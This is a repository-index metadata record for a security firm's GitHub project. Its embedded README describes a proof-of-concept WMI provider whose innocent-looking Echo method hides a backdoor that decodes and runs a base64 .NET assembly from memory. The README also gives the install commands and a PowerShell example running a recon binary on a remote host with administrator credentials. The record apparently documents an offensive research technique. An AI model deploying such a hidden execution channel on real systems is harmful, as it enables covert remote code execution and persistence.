{"id":20563705,"url":"https://github.com/trustedsec/scriptkiddie-wmi-provider","last_synced_at":"2025-04-14T14:43:12.138Z","repository":{"id":37701985,"uuid":"499133202","full_name":"trustedsec/scriptkiddie-wmi-provider","owner":"trustedsec","description":null,"archived":false,"fork":false,"pushed_at":"2022-06-13T18:50:13.000Z","size":6,"stargazers_count":15,"open_issues_count":1,"forks_count":4,"subscribers_count":3,"default_branch":"master","last_synced_at":"2025-03-28T03:41:22.215Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/trustedsec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2022-06-02T12:49:23.000Z","updated_at":"2025-01-29T15:14:30.000Z","dependencies_parsed_at":"2022-09-15T11:40:18.561Z","dependency_job_id":null,"html_url":"https://github.com/trustedsec/scriptkiddie-wmi-provider","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fscriptkiddie-wmi-provider","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fscriptkiddie-wmi-provider/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fscriptkiddie-wmi-provider/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/trustedsec%2Fscriptkiddie-wmi-provider/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/trustedsec","download_url":"https://codeload.github.com/trustedsec/scriptkiddie-wmi-provider/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":248898710,"owners_count":21179826,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-16T04:20:21.996Z","updated_at":"2025-04-14T14:43:12.112Z","avatar_url":"https://github.com/trustedsec.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# Script Kiddie WMI Provider\n\nThis repo contains the source code necessary to build the Script Kiddie WMI Provider example from the blog, \"WMI Providers for Script Kiddies\". Please see the blog for a description of the WMI provider.\n\n# Capabilities\n\nThe Script Kiddie provider demonstrates how to implement a WMI method provider. It implements/exposes one method: Echo. This method has a begnin function and a secret function.\n\n## Begnin Function\n\nThe Echo method simply returns the input argument prepended with the string \"Echo: \".\n\n## Secret Function\n\nIf the input argument begins with '!', then the method will:\n\n1. Decoded the input argument\n2. Load the decoded .NET assembly into memory\n3. Execute the .NET assembly from memory\n4. Return the .NET assembly output\n\n# Build\n\n1. Open the solution with Visual Studio\n2. Build the release version\n3. Binaries are generated in bin/Release/ subdirectory\n\n# Install\n\n1. Copy the binaries to target (preferrably C:\\Windows\\System32\\wbem\\)\n2. Install the .NET assembly using Microsoft .NET Install Utility\n```\nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe C:\\Windows\\System32\\wbem\\Win32_Echo.dll\n```\nNOTE: On x86 systems the Install Utility directory is under C:\\Windows\\Microsoft.NET\\Framework\n\n# Use\n\n## Begnin Function\n```\nPS C:\\tmp\u003e Invoke-WMIMethod -Namespace ROOT\\test -Class Win32_Echo -Name Echo -ArgumentList \"Hello World!\"\n\n\n__GENUS          : 2\n__CLASS          : __PARAMETERS\n__SUPERCLASS     :\n__DYNASTY        : __PARAMETERS\n__RELPATH        :\n__PROPERTY_COUNT : 1\n__DERIVATION     : {}\n__SERVER         :\n__NAMESPACE      :\n__PATH           :\nReturnValue      : Echo: Hello World!\nPSComputerName   :\n```\n\n## Secret Function\n```\nPS C:\\tmp\u003e .\\recon.exe\n\nrecon\n=============================\nuserName:  WIN10-X64-DEV\\todda1\ndnsName:   Win10-x64-Dev\nipAddress: 192.168.0.134\n\nPS C:\\tmp\u003e $exeContent = Get-Content C:\\tmp\\recon.exe -Encoding byte\n\nPS C:\\tmp\u003e $encodedContent = [System.Convert]::ToBase64String($exeContent)\n\nPS C:\\tmp\u003e Invoke-WMIMethod -Credential 192.168.0.104\\Administrator -ComputerName 192.168.0.104 -Namespace \"ROOT\\test\" -Class \"Win32_Echo\" -Name \"Echo\" -ArgumentList \"!$encodedContent\"\n\n\n__GENUS          : 2\n__CLASS          : __PARAMETERS\n__SUPERCLASS     :\n__DYNASTY        : __PARAMETERS\n__RELPATH        :\n__PROPERTY_COUNT : 1\n__DERIVATION     : {}\n__SERVER         :\n__NAMESPACE      :\n__PATH           :\nReturnValue      :\n                   recon\n                   =============================\n                   userName:  WIN10-X86\\Administrator\n                   dnsName:   win10-x86\n                   ipAddress: 192.168.0.104\n\nPSComputerName   :\n```\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fscriptkiddie-wmi-provider","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Ftrustedsec%2Fscriptkiddie-wmi-provider","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Ftrustedsec%2Fscriptkiddie-wmi-provider/lists"}